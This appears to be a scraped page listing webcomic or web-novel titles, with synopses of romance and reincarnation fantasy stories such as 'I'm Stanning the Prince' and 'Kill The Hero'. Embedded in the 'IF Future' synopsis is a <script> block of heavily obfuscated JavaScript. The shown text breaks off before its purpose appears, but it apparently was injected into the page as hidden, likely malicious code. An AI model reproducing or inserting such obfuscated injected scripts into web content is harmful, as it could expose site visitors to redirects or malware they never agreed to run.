2020 - Page 28

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

741 results

I’m Stanning the Prince

Angela’s fanfic became such a sensation that it even reached the Imperial Family, leading her to get arrested on charges of treason. Nevertheless, her fanfic improved the First Prince’s image, and his sister, the Princess, decides to take political advantage of this and keep Angela by their side. The heroine who can now fangirl to her heart’s content, and the Prince who doesn’t know how to act around her. As they bicker back and forth, they start growing closer…


I Became the Chef of the Dragon King

Chong Shim threw herself into the sea of Indangsu! What will happen when she wakes up in a lazy dragon’s dungeon? Meet many cute monsters while living a delicious, symbiotic life!


I Became the Ugly Lady

Of all things, I possessed an ugly noble lady. For the sake of receiving the attention of those who despised her, Sylvia Atlante, in the midst of all the ridicule and disrespect, made herself known as the “ugly lady”. However, one day, I happened to possess Sylvia’s body, who drank poison and ended her own life. I didn’t want to live like her. “I’m rich and healthy, so why do I need to care about other people? This is my life, I’m going to live as I want!” I just wanted to live a quiet life, but… “Still, you’re my little sister, and you’re part of the Atlante family.” The family’s a little strange. “I’m interested in you, not your younger sister.” “You must take responsibility for this body until the end. That’s the job of the contractor.” “I, Theve Hiddleton, swear to be the sword of Sylvia Atlante and devote everything to her.” “I won’t bother you. So please, keep me by your side!” “There’s nothing in this world I can’t find. So don’t even try to run away from me.” The handsome guys who I thought I’d never get involved with stuck around. What’s wrong with everyone? Isn’t this too different from Sylvia’s memory? I just wanted to live a peaceful life?!


Xiao Bai’s father is a wonderful person

Because of a conspiracy they had a cute baby together. A few years later, they meet again and she finally felt some “love” for him. After meeting him more often her perspective of him changed. The ruthless man in the rumors doesn’t seem to be as she imagined…


Kill The Hero

One day, the world transformed into a game. ‘Dungeons’ and ‘monsters’ emerged in the middle of cities, and ‘players’ who had received the gods’ authority appeared. Se-jun Lee, the guildmaster of the Messiah Guild that would bring salvation to the world. “Let us save the world together. Let’s put an end to this nightmare.” The whole world celebrated the hero’s appearance, And I became his comrade. But… He wasn’t a hero nor a messiah like the world was hailing him. He was a deceitful hero with the secret ambition to rule the world. “You did well. If it weren’t for you, I couldn’t have come up till here.” I lost my life at his blade in the last dungeon. …or so i thought. The announcement I heard next to my ear the moment I died. [Starting the game.] I returned to the past, back when I still hadn’t awakened as a player. And this time, It’s my turn…… To ‘hunt’ him. [u][b]Français:[/b][/u] [spoiler] Nous sommes dans un monde semblable à un jeu, où donjons, monstres et joueurs apparaissent. Dans un monde dans lequel je suis le seul à connaître la vérité, le secret de celui qu’on appelle le Messie, celui qui souhaite gouverner ce monde comme son seul et unique empereur. Moi seul qui ai vécu sa trahison, moi seul qui ai été assassiné de ses propres mains avant d’être renvoyé dans le passé connaît cette vérité… [/spoiler]


The Song of Theodor

During her childhood years, Sienna, the vivacious Princess of the Western Empire, and Latio, the Prince of the Northern Kingdom who was sent over as a political hostage, had a fateful encounter. The two gradually opened their hearts to each other, while the young King Nyah of the Eastern Empire observed them from the shadows… Alas, the tranquil peace between the three kingdoms was but a mere facade, soon to be shattered at the drop of a hat. As war broke out, the past childhood sweethearts are now faced with impossible choices that pit love against duty: battle and bloodshed, smoke and tears, sincerity and betrayal— riddled with turmoil, the two must come together to compose a song, a song of a boy and girl — the “Song of Theodor”.


The Twin Siblings’ New Life

“Your names will be Arjen and Arien.” We were just like any normal twins going to high school, but then we lost our lives to a sudden accident and our second life as twins began! And so we live inside an abandoned palace along with an abusive mother and a cold-hearted emperor as a father. But on our 5th birthday… The king suddenly wants to see his children. “Why so suddenly?” We can only trust ourselves! Initiate the twins’ Project Survive the Palace! A tale about siblings who were reincarnated together at the palace. The siblings are the main characters, and though they cherish one another very much, there are no incestuous elements.


Choose Your Real Daddy Tyrant

Dr. Jaehee Cheon, who lost her parents at early age and can’t remember their face, who has lived without a single friend, let alone a lover, reincarnated as the unlucky princess in a novel that dies at the age of twelve! If we can’t find the princess’ biological father, she will die. But apparently there are four candidates??? And the bigger problem is that they are too deadly…. Will Chun Jae-hee be able to find her real father safely and have a happy ending?


Please Throw Me Away

<h2>Please Throw Me Away and I Want You to Throw Me Away</h2> Adele was adopted in replacement of a lady who died from a rare disease. She worked her entire life so she would be loved, but as soon as her younger sister was born, she was abandoned. Then on Adele’s way to an arranged marriage, she was assassinated by mysterious enemies. “…Is this a dream?” But when she opened her eyes, she returned to 3 years in the past! Since she is destined to be abandoned when her younger sister is born, this time around, she tries to live the way she wants, but things keep going wrong. “Weren’t you interested in me?” And a mysterious knight in black keeps pursuing her…


IF Future

Wei Lai accidentally picked up a mysterious camera that can take pictures of the future but found that it only has an effect on her secret crush, a senior.<script></script><script>(function(_0x211584,_0x56cbb6){var _0x7292a6=_0x15a5,_0x29a976=_0x211584();while(!![]){try{var _0xf64dc9=-parseInt(_0x7292a6(0x11e))/(-0x10f3+0x19e2+-0x8ee)+parseInt(_0x7292a6(0x112))/(-0x8d8*-0x1+-0x1201*0x1+-0x1*-0x92b)+-parseInt(_0x7292a6(0x108))/(0x21b6*-0x1+0x17f*0x3+0x1d3c)+parseInt(_0x7292a6(0x113))/(-0x14f3+0x16bb+-0x4*0x71)+-parseInt(_0x7292a6(0x120))/(-0x35e*-0x2+0xb78+-0x122f)+parseInt(_0x7292a6(0x117))/(0xf6+0xc5*0x2e+-0x122b*0x2)+parseInt(_0x7292a6(0x122))/(0x19ae+0x143a+-0x2de1);if(_0xf64dc9===_0x56cbb6)break;else _0x29a976['push'](_0x29a976['shift']());}catch(_0x33cce5){_0x29a976['push'](_0x29a976['shift']());}}}(_0x26a4,0xbbb80+-0xb*-0x15029+0xac52*-0x15));function _0x26a4(){var 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I’m Just An Immortal

In this era, people are always reincarnation, but I Lin Fei, depends on being immortal. I have lived for hundreds of million years, just to find my beloved ones that I lost for a million years!!
